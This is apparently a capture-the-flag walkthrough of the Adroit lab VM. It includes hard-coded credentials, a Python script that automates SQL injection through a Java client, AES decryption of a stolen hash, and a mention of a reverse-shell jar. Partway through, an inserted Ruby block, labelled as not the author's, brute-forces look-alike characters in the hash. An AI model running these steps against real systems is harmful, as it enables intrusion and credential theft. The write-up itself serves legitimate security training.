The machine can be downloaded here.
First, scan the ports with Nmap.
Start with port 21. Log in to FTP as the anonymous user and download all three files.
Check structure.PNG, which shows how the jar program works: we cannot connect to the MySQL database directly, only through a proxy in the middle.
Now the most important part: the jar. First we try to execute it; nothing happens. We open it in jd-gui to see what it does.
From the decompiled Java code we learn the following:
(1) The jar program uses AES and Base64 to encrypt and decrypt the username and password needed to connect to the proxy.
(2) The proxy is located at adroit.local:3000.
(3) The username and password of the proxy.
We add adroit.local to /etc/hosts and run the jar again. This time it works and asks for a username and password. Enter the user:pass pair from the decompiled jar and we reach the operation step.
After a few tests we know that the "post" operation just saves something in the database (the identifier must be a number).
The "get" operation just loads that data from the database.
Testing the other two ports, 3306 and 33060, gives no access, so our focus is on this app. Maybe it has a MySQL injection; in fact, the program is vulnerable to a MySQL UNION SELECT injection.
Because the jar exits after each operation, we can write a small script to automate the injection. The code is below:
import subprocess

try:
    while True:
        # The jar exits after every operation, so start a fresh instance each loop.
        p = subprocess.Popen(['java', '-jar', 'adroitclient.jar'],
                             stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             bufsize=1, encoding='utf-8')
        # Answer the username and password prompts with the credentials from the decompiled jar.
        buff = p.stdout.readline()
        p.stdin.write("zeus\n")
        buff = p.stdout.readline()
        p.stdin.write("god.thunder.olympus\n")
        # Choose the "get" operation, then send the injected identifier.
        buff = p.stdout.readline()
        p.stdin.write("get\n")
        buff = p.stdout.readline()
        cmd = input("Please input your mysql injection command:\n")
        p.stdin.write(cmd + "\n")
        p.stdin.flush()
        buff = p.stdout.readline()
        print(buff)
        p.wait()  # reap the exited jar before the next round
except KeyboardInterrupt:
    exit()
The injection process is self-explanatory. In the end we get a username and a password hash.
Now we need to decrypt the password hash, but the hash is not in a standard format.
So maybe we can use the decryption code from the jar file to try. The code is below.
import base64
from Crypto.Cipher import AES

secret = "Sup3rS3cur3Dr0it"                                # hard-coded key from the jar
enc_text = "l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY="  # password hash from the database
# ECB mode is what the old PyCrypto call AES.new(secret) used implicitly;
# PyCryptodome requires the mode and a bytes key to be given explicitly.
cipher = AES.new(secret.encode(), AES.MODE_ECB)
# Padding bytes are not stripped here, and undecodable bytes are dropped.
print(cipher.decrypt(base64.b64decode(enc_text)).decode('utf-8', 'ignore'))
But the output does not look like a complete string; the last few characters fail to decode.
After a long time of trial and error, I asked the author for help. He told me to check the VM description.
Then we change a 0 to an O in the password hash and get the correct password.
Now we can log in over SSH, and sudo -l gives us a hint.
Because I'm not a good Java coder, I downloaded a jar reverse-shell generator from the internet.
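As an added example (not the author's code, and written in Ruby because its standard OpenSSL binding provides AES without extra packages), the same AES/ECB + Base64 decryption with the checks the snippet above lacks: bad PKCS#5 padding or non-printable output is treated as failure instead of printing a half-decoded string, and single look-alike substitutions (0/O, 1/l/I, 5/S, 8/B) are then retried to locate the transcription error. It assumes the jar uses ECB with PKCS#5 padding, as the PyCrypto call above also assumes; the confusable set is my choice, and the sample ciphertext is constructed inside the script rather than taken from the machine.

```ruby
require 'openssl'
require 'base64'
JAR_KEY = 'Sup3rS3cur3Dr0it' # hard-coded key from the decompiled jar

# Look-alike characters a human may mis-copy when transcribing a hash (assumed set).
CONFUSABLE = { '0' => 'O', 'O' => '0', '1' => 'lI', 'l' => '1I', 'I' => '1l',
               '5' => 'S', 'S' => '5', '8' => 'B', 'B' => '8' }.freeze

# AES/ECB with PKCS#5 padding, the mode the PyCrypto AES.new(secret) call above used implicitly.
def aes_ecb(key, enc)
  c = OpenSSL::Cipher.new('aes-128-ecb')
  enc ? c.encrypt : c.decrypt
  c.key = key
  c
end
# pad -> AES/ECB -> Base64; exists only to build a known sample for the demo.
def encrypt_ecb(key, plain)
  c = aes_ecb(key, true)
  Base64.strict_encode64(c.update(plain) + c.final)
end

# Mirrors the jar (Base64 -> AES/ECB -> unpad) but treats bad padding or non-printable
# bytes as failure: one mis-copied character garbles a whole 16-byte block, which is
# the "decode error" seen above. Returns the plaintext or nil.
def decrypt_ecb(key, b64)
  c = aes_ecb(key, false)
  plain = c.update(Base64.strict_decode64(b64)) + c.final # final raises on bad padding
  plain.bytes.all? { |b| b.between?(0x20, 0x7e) } ? plain : nil
rescue OpenSSL::Cipher::CipherError, ArgumentError
  nil
end

# Retries every single look-alike substitution and returns [fixed_b64, plaintext] for
# the first candidate that decrypts cleanly, generalising the 0 -> O fix above.
def repair(key, b64)
  plain = decrypt_ecb(key, b64)
  return [b64, plain] if plain
  b64.each_char.with_index do |ch, i|
    CONFUSABLE.fetch(ch, '').each_char do |alt|
      cand = b64.dup
      cand[i] = alt
      plain = decrypt_ecb(key, cand)
      return [cand, plain] if plain
    end
  end
  nil
end

# Constructed sample, not a value from the machine: encrypt, then mis-copy the first look-alike char.
sample = encrypt_ecb(JAR_KEY, 'constructed-sample-password')
broken = sample.sub(/[0O1lI5S8B]/) { |ch| CONFUSABLE[ch][0] }
p repair(JAR_KEY, broken)
```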
At last, we get root.